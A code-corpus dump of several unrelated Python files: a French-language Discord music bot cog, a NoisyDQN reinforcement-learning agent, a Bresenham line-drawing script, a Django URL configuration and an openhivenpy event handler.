self.get_voice_state(ctx)\n\n async def cog_command_error(self, ctx: commands.Context, error: commands.CommandError):\n await ctx.send('Erreur: {}'.format(str(error)))\n\n @commands.command(name='summon', invoke_without_subcommand=True)\n async def _join(self, ctx: commands.Context):\n \"\"\"Invoque Sisyphe dans le salon courant.\"\"\"\n\n destination = ctx.author.voice.channel\n if ctx.voice_state.voice:\n await ctx.voice_state.voice.move_to(destination)\n return\n\n ctx.voice_state.voice = await destination.connect()\n\n @commands.command(name='join')\n @commands.has_permissions(manage_guild=True)\n async def _summon(self, ctx: commands.Context, *, channel: discord.VoiceChannel = None):\n \"\"\"Déplace Sisyphe dans le salon courant ou l'invoque.\n \"\"\"\n\n if not channel and not ctx.author.voice:\n raise VoiceError(\"Vous devez d'abord rejoindre un salon vocal\")\n\n destination = channel or ctx.author.voice.channel\n if ctx.voice_state.voice:\n await ctx.voice_state.voice.move_to(destination)\n return\n\n ctx.voice_state.voice = await destination.connect()\n\n @commands.command(name='leave', aliases=['disconnect'])\n @commands.has_permissions(manage_guild=True)\n async def _leave(self, ctx: commands.Context):\n \"\"\"Renvoit Sisyphe.\"\"\"\n\n if not ctx.voice_state.voice:\n return await ctx.send(\"Sisyphe n'est pas dans un salon vocal\")\n\n await ctx.voice_state.stop()\n del self.voice_states[ctx.guild.id]\n\n @commands.command(name='volume')\n async def _volume(self, ctx: commands.Context, *, volume: int):\n \"\"\"Change le volume du lecteur.\"\"\"\n\n if not ctx.voice_state.is_playing:\n return await ctx.send(\"Rien n'est joué pour le moment\")\n\n if 0 > volume > 100:\n return await ctx.send('Le volume doit être entre 0 et 100')\n\n ctx.voice_state.volume = volume / 100\n await ctx.send('Volume mis à {}%'.format(volume))\n\n @commands.command(name='now', aliases=['current', 'playing'])\n async def _now(self, ctx: commands.Context):\n \"\"\"Montre les informations de la musique.\"\"\"\n\n await ctx.send(embed=ctx.voice_state.current.create_embed())\n\n @commands.command(name='pause')\n @commands.has_permissions(manage_guild=True)\n async def _pause(self, ctx: commands.Context):\n \"\"\"Mets en pause.\"\"\"\n\n if ctx.voice_state.voice.is_playing():\n ctx.voice_state.voice.pause()\n await ctx.message.add_reaction('⏯')\n\n @commands.command(name='resume')\n @commands.has_permissions(manage_guild=True)\n async def _resume(self, ctx: commands.Context):\n \"\"\"Enlève la pause.\"\"\"\n\n if ctx.voice_state.voice.is_paused():\n ctx.voice_state.voice.resume()\n await ctx.message.add_reaction('⏯')\n\n @commands.command(name='clear',aliases=['stop'])\n @commands.has_permissions(manage_guild=True)\n async def _clear(self, ctx: commands.Context):\n \"\"\"Vide la file. (aliase:!stop)\"\"\"\n if ctx.voice_state:\n ctx.voice_state.songs.clear()\n if ctx.voice_state.is_playing:\n ctx.voice_state.voice.stop()\n await ctx.send(\"La file a été vidée\")\n await ctx.message.add_reaction('⏹')\n else:\n await ctx.send(\"Sisyphe n'est pas connecté\")\n\n @commands.command(name='skip')\n async def _skip(self, ctx: commands.Context):\n \"\"\"Vote pour passer.\n \"\"\"\n\n if not ctx.voice_state.is_playing:\n return await ctx.send('Ne joue rien actuellement')\n\n voter = ctx.message.author\n if voter == ctx.voice_state.current.requester:\n await ctx.message.add_reaction('⏭')\n ctx.voice_state.skip()\n\n elif voter.id not in ctx.voice_state.skip_votes:\n ctx.voice_state.skip_votes.add(voter.id)\n total_votes = len(ctx.voice_state.skip_votes)\n\n if total_votes >= 2:\n await ctx.message.add_reaction('⏭')\n ctx.voice_state.skip()\n else:\n await ctx.send('Actuellement **{} votes/2** pour passer'.format(total_votes))\n\n else:\n await ctx.send('Tu as déjà voté')\n\n @commands.command(name='queue')\n async def _queue(self, ctx: commands.Context, *, page: int = 1):\n \"\"\"Montre la file d'attente.\n \"\"\"\n\n if len(ctx.voice_state.songs) == 0:\n return await ctx.send('La file est vide')\n\n items_per_page = 10\n pages = math.ceil(len(ctx.voice_state.songs) / items_per_page)\n\n start = (page - 1) * items_per_page\n end = start + items_per_page\n\n queue = ''\n for i, song in enumerate(ctx.voice_state.songs[start:end], start=start):\n queue += '`{0}.` [**{1.source.title}**]({1.source.url})\\n'.format(i + 1, song)\n\n embed = (discord.Embed(description='**{} pistes:**\\n\\n{}'.format(len(ctx.voice_state.songs), queue))\n .set_footer(text='Viewing page {}/{}'.format(page, pages)))\n await ctx.send(embed=embed)\n\n @commands.command(name='shuffle')\n async def _shuffle(self, ctx: commands.Context):\n \"\"\"Mélange la file.\"\"\"\n\n if len(ctx.voice_state.songs) == 0:\n return await ctx.send('.')\n\n ctx.voice_state.songs.shuffle()\n await ctx.message.add_reaction('✅')\n\n @commands.command(name='remove')\n async def _remove(self, ctx: commands.Context, index: int):\n \"\"\"Enlève une musique à l'index donné.\"\"\"\n\n if len(ctx.voice_state.songs) == 0:\n return await ctx.send('Empty queue.')\n\n ctx.voice_state.songs.remove(index - 1)\n await ctx.message.add_reaction('✅')\n\n @commands.command(name='loop')\n async def _loop(self, ctx: commands.Context):\n \"\"\"Rejouer la musique actuelle. (NE MARCHE PAS)\n \"\"\"\n\n if not ctx.voice_state.is_playing:\n return await ctx.send(\"Rien n'ai joué actuellement\")\n\n # Inverse boolean value to loop and unloop.\n ctx.voice_state.loop = not ctx.voice_state.loop\n await ctx.message.add_reaction('✅')\n\n @commands.command(name='play')\n async def _play(self, ctx: commands.Context, *, search: str):\n \"\"\"Joue une musique avec un url ou un nom.\n \"\"\"\n\n if not ctx.voice_state.voice:\n await ctx.invoke(self._join)\n\n async with ctx.typing():\n try:\n source = await YTDLSource.create_source(ctx, search, loop=self.client.loop)\n except YTDLError as e:\n await ctx.send(\"Erreur lors de l'execution de la requête: {}\".format(str(e)))\n else:\n song = Song(source)\n\n await ctx.voice_state.songs.put(song)\n await ctx.send('Mise en file de {}'.format(str(source)))\n\n @commands.command(name='chacha')\n async def _chacha(self,ctx: commands.Context):\n \"\"\"On ne négocie pas avec les terroristes\n \"\"\"\n if not ctx.voice_state.voice:\n await ctx.invoke(self._join)\n \n ctx.voice_state.songs.clear()\n if ctx.voice_state.voice.is_playing():\n ctx.voice_state.voice.stop()\n ctx.voice_state.voice.play(discord.FFmpegPCMAudio('assets/chacha.mp3'))\n await ctx.send(\"On ne négocie pas avec les terroristes !\")\n\n\n @_join.before_invoke\n @_play.before_invoke\n async def ensure_voice_state(self, ctx: commands.Context):\n if not ctx.author.voice or not ctx.author.voice.channel:\n raise commands.CommandError(\"Vous n'etes pas connecté à un salon vocal\")\n\n if ctx.voice_client:\n if ctx.voice_client.channel != ctx.author.voice.channel:\n raise commands.CommandError('Sisyphe est déjà dans un salon vocal')\n\n #Greetings user if not playing\n @commands.Cog.listener()\n async def on_voice_state_update(self,member,before, after):\n if member.bot == False:\n guildid = member.guild.id\n voice_state = self.voice_states.get(guildid)\n if voice_state:\n if before.channel != voice_state.voice.channel and after.channel == voice_state.voice.channel:\n if voice_state.voice.is_playing() == False and voice_state.voice.is_paused() == False :\n voice_state.voice.play(discord.FFmpegPCMAudio('assets/chacha.mp3'))\n \ndef setup(client):\n client.add_cog(Musique(client))","sub_path":"cogs/musique.py","file_name":"musique.py","file_ext":"py","file_size_in_byte":17497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"380169034","text":"import copy\nfrom typing import Any\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\nfrom typing import Union\n\nimport gymnasium as gym\nimport numpy as np\nimport torch\nfrom torch import nn\n\nfrom ..nn.dueling import Dueling\nfrom ..nn.fcn import FCN\nfrom ..nn.noisy_linear import NoisyLinear\nfrom .double_dqn import DoubleDQN\n\n\nclass NoisyDQNPolicy(nn.Sequential):\n\n def __init__(self, input_dim: int, output_dim: int, net_arch: List[int] = [128], deuling: bool = False) -> None:\n hidden_dim = input_dim if len(net_arch) == 0 else net_arch[-1]\n\n layers = [FCN(input_dim, output_dim=None, net_arch=net_arch)]\n if deuling:\n layers += [\n Dueling(\n nn.Sequential(\n NoisyLinear(hidden_dim, hidden_dim),\n nn.ReLU(inplace=True),\n NoisyLinear(hidden_dim, output_dim),\n ),\n nn.Sequential(\n NoisyLinear(hidden_dim, hidden_dim),\n nn.ReLU(inplace=True),\n NoisyLinear(hidden_dim, 1),\n ),\n )\n ]\n else:\n layers += [\n NoisyLinear(hidden_dim, hidden_dim),\n nn.ReLU(inplace=True),\n NoisyLinear(hidden_dim, output_dim),\n ]\n\n super(NoisyDQNPolicy, self).__init__(*layers)\n\n def reset_noise(self) -> None:\n for m in self.modules():\n if isinstance(m, NoisyLinear):\n m.reset_noise()\n\n\nclass NoisyDQN(DoubleDQN):\n\n def __init__(self,\n env: gym.Env,\n policy_kwargs: Optional[Dict[str, Any]] = None,\n learning_rate: float = 0.0001,\n buffer_size: int = 1000000,\n exploration_initial_epsilon: float = 1,\n exploration_final_epsilon: float = 0.01,\n exploration_fraction: float = 0.5,\n batch_size: int = 32,\n gamma: float = 0.99,\n tau: float = 1,\n update_target_interval: int = 1000,\n max_grad_norm: float = 10.0,\n device: str = 'cuda',\n initial_setup: bool = True) -> None:\n super().__init__(env, policy_kwargs, learning_rate, buffer_size, exploration_initial_epsilon,\n exploration_final_epsilon, exploration_fraction, batch_size, gamma, tau,\n update_target_interval, max_grad_norm, device, initial_setup)\n\n def setup_models(self):\n self.policy_net = NoisyDQNPolicy(self.obs_dim, self.action_dim, **self.policy_kwargs).to(self.device)\n self.target_net = copy.deepcopy(self.policy_net).to(self.device)\n self.target_net.eval()\n\n @torch.no_grad()\n def predict(self, observation: Union[np.ndarray, Dict[str, np.ndarray]], deterministic: bool = False):\n\n obs = self._convert_tensor(observation)\n action = self.policy_net(obs).argmax().detach().item()\n\n return action\n\n def train(self):\n loss = super().train()\n\n self.policy_net.reset_noise()\n self.target_net.reset_noise()\n\n return loss\n","sub_path":"haruna/agents/noisy_dqn.py","file_name":"noisy_dqn.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"458874599","text":"#############################################\n# @name = Aditya Shirwatkar\n# @github = aditya-shirwatkar\n# @copyright = None \n#############################################\n\n# x1, y1 should be lower\n\nx1 = -1; x2 = 1\ny1 = -2; y2 = 4\n\nm = round((y2-y1)/(x2-x1), 3) if (x2-x1) != 0 else 100000000 # used just to represnt inf\n\ndx = abs(x2-x1)\ndy = abs(y2-y1)\ntwo_dy = 2*dy \ntwo_dx = 2*dx\n\nlinePoints = []\np = []\np_current = 2*dy - dx\np.append(p_current)\n\ni=0\n\nprint('######### INFO #########')\nprint('x1 = ', x1, ' ', 'y1 = ', y1)\nprint('x2 = ', x2, ' ', 'y2 = ', y2)\nprint('dx = ', dx, ' ', 'dy = ', dy, ' ', 'm = ', m)\n\n## For m<1\nif m < 1:\n if abs(dx) > abs(dy):\n if x1 > x2:\n x, y = x2, y2\n else:\n x, y = x1, y1\n \n linePoints.append([x, y])\n\n while dx>0 :\n if p_current > 0 :\n x, y = x+1, y+1\n linePoints.append([x, y])\n p_current += (two_dy - two_dx)\n p.append(p_current)\n else:\n x += 1\n linePoints.append([x, y])\n p_current += two_dy\n p.append(p_current)\n \n dx-=1\n i+=1\n## for m >1\nelse:\n if y1>y2:\n x,y = x2, y2\n else:\n x,y = x1, y1\n \n linePoints.append([x, y])\n \n while dy>0 :\n if p_current > 0:\n x, y = x+1, y+1\n linePoints.append([x, y])\n p_current += two_dx - two_dy\n p.append(p_current) \n # elif p_current > 0 and dx == 0:\n # y += 1\n # linePoints.append([x, y])\n # p_current += two_dx - two_dy\n # p.append(p_current)\n else:\n y += 1\n linePoints.append([x, y])\n p_current += two_dx\n p.append(p_current)\n \n dy-=1\n i+=1\n\nprint('Line', linePoints)\nprint('-----------')\nprint('p', p)\n\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\nimport numpy as np\n\nN = 4*len(linePoints)\n# make an empty data set\ndata = np.ones((N, N)) * np.nan\n# fill in some fake data\nfor point in linePoints:\n data[N-1 - (N//2 + point[1]), (point[0] + N//2)] = 1\n\n# make a figure + axes\nfig, ax = plt.subplots(1, 1, tight_layout=True)\n# make color map\nmy_cmap = colors.ListedColormap(['r', 'g', 'b'])\n# set the 'bad' values (nan) to be white and transparent\nmy_cmap.set_bad(color='w', alpha=0)\n# draw the grid\nfor x in range(N + 1):\n ax.axhline(x, lw=2, color='k', zorder=5)\n ax.axvline(x, lw=2, color='k', zorder=5)\n# draw the boxes\nax.imshow(data, interpolation='none', cmap=my_cmap, extent=[0, N, 0, N], zorder=0)\n# turn off the axis labels\nax.axis('off')\n\nplt.show()","sub_path":"bressenham/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"162734598","text":"\"\"\"ecomm URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path,include\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n# from django.conf.urls import url,include\n\nurlpatterns = [\n path(r'admin/',admin.site.urls),\n path(r'cart/',include('cart.urls')),\n path(r'orders/', include('orders.urls')), \n path(r'coupons/',include('coupons.urls')),\n path(r'paypal/', include('paypal.standard.ipn.urls')),\n path(r'payment/', include('payment.urls')),\n path(r'account/', include('account.urls')),\n path(r'forum/',include('forum.urls')),\n path(r'hire/',include('hire.urls')),\n path(r'', include('efarm.urls')),\n path(r'cabook/',include('cabook.urls')),\n path(r'book/',include('book.urls')),\n path(r'search/', include('haystack.urls')),\n # path('', include('social.apps.django_app.urls', namespace='social')),\n\n \n]\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)\n urlpatterns += static(settings.STATIC_URL,document_root=settings.STATIC_ROOT)\n","sub_path":"ecomm/ecomm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"293422760","text":"import logging\nimport typing\nfrom functools import wraps\n\nfrom openhivenpy.utils import dispatch_func_if_exists\n\nlogger = logging.getLogger(__name__) \n\n\nclass EventHandler:\n \"\"\"\n Event Handler for the HivenClient Class. Functions will be called from the\n websocket class and if the user registered an event response with the\n decorator @HivenClient.event, it will be called and executed.\n \"\"\"\n def __init__(self, call_obj: object = None):\n self._call_obj = call_obj\n if self._call_obj is None:\n logger.debug(\"[EVENT-HANDLER] Passed object where the events should be called from is None!\")\n self._call_obj = self\n\n def event(self, func: typing.Coroutine = None):\n \"\"\"\n Decorator used for registering Client Events\n \n :param func: Function that should be wrapped. Only usable if the wrapper is used in the function syntax: 'event(func)'!\n \n \"\"\"\n def decorator(func_: typing.Coroutine):\n @wraps(func_)\n async def wrapper(*args, **kwargs): \n return await func_(*args, **kwargs)\n \n setattr(self, func_.__name__, wrapper) # Adding the function to the object\n\n logger.debug(f\"[EVENT-HANDLER] >> Event {func_.__name__} registered\")\n\n return func_ # func can still be used normally\n\n # TODO! Needs to raise Exception if not async using 'inspect.iscoroutinefunction(func):'\n if func is None:\n return decorator\n else:\n return decorator(func)\n\n async def dispatch_on_connection_start(self) -> None:\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_connection_start'\n )\n\n async def dispatch_on_init(self, time) -> None:\n param = [time]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_init',\n func_args=param\n )\n\n async def dispatch_on_ready(self) -> None:\n param = []\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_ready',\n func_args=param\n )\n\n async def dispatch_on_user_update(self, old, new) -> None:\n param = [old, new]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_user_update',\n func_args=param\n )\n\n async def dispatch_on_house_update(self, old, new) -> None:\n param = [old, new]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_house_update',\n func_args=param\n )\n\n async def dispatch_on_house_add(self, house) -> None:\n param = [house]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_house_join',\n func_args=param\n )\n\n async def dispatch_on_house_remove(self, house) -> None:\n param = [house]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_house_remove',\n func_args=param\n )\n\n async def dispatch_on_house_delete(self, house_id) -> None:\n param = [house_id]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_house_delete',\n func_args=param\n )\n\n async def dispatch_on_house_down_time(self, house_id) -> None:\n param = [house_id]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_house_downtime',\n func_args=param\n )\n\n async def dispatch_on_room_create(self, room) -> None:\n param = [room]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_room_create',\n func_args=param\n )\n\n async def dispatch_on_house_member_join(self, member, house) -> None:\n param = [member, house]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_house_member_join',\n func_args=param\n )\n\n async def dispatch_on_house_member_enter(self, member, house) -> None:\n param = [member, house]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_house_member_online',\n func_args=param\n )\n\n async def dispatch_on_house_member_leave(self, member, house) -> None:\n param = [member, house]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_house_member_leave',\n func_args=param\n )\n\n async def dispatch_on_house_member_exit(self, member, house) -> None:\n param = [member, house]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_house_member_offline',\n func_args=param\n )\n\n async def dispatch_on_relationship_update(self, relationship) -> None:\n param = [relationship]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_relationship_update',\n func_args=param\n )\n\n async def dispatch_on_presence_update(self, presence, user) -> None:\n param = [presence, user]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_presence_update',\n func_args=param\n )\n\n async def dispatch_on_message_create(self, message) -> None:\n param = [message]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_message_create',\n func_args=param\n )\n\n async def dispatch_on_message_delete(self, message) -> None:\n param = [message]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_message_delete',\n func_args=param\n )\n \n async def dispatch_on_message_update(self, message) -> None:\n param = [message]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_message_update',\n func_args=param\n )\n\n async def dispatch_on_typing_start(self, typing) -> None:\n param = [typing]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_typing_start',\n func_args=param\n )\n\n async def dispatch_on_typing_end(self, typing) -> None:\n param = [typing]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_typing_end',\n func_args=param\n )\n\n async def dispatch_on_member_update(self, old, new, house) -> None:\n param = [old, new, house]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_member_update',\n func_args=param\n )\n\n async def dispatch_on_house_member_chunk(self, members: list, house, data: dict) -> None:\n param = [members, house]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_house_member_chunk',\n func_args=param\n )\n\n async def dispatch_on_batch_house_member_update(self, house, members, data: dict) -> None:\n param = [members, data, house]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_batch_house_member_update',\n func_args=param\n )\n\n async def dispatch_on_house_entity_update(self, house) -> None:\n param = [house]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_house_entity_update',\n func_args=param\n )\n","sub_path":"openhivenpy/events/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":7727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}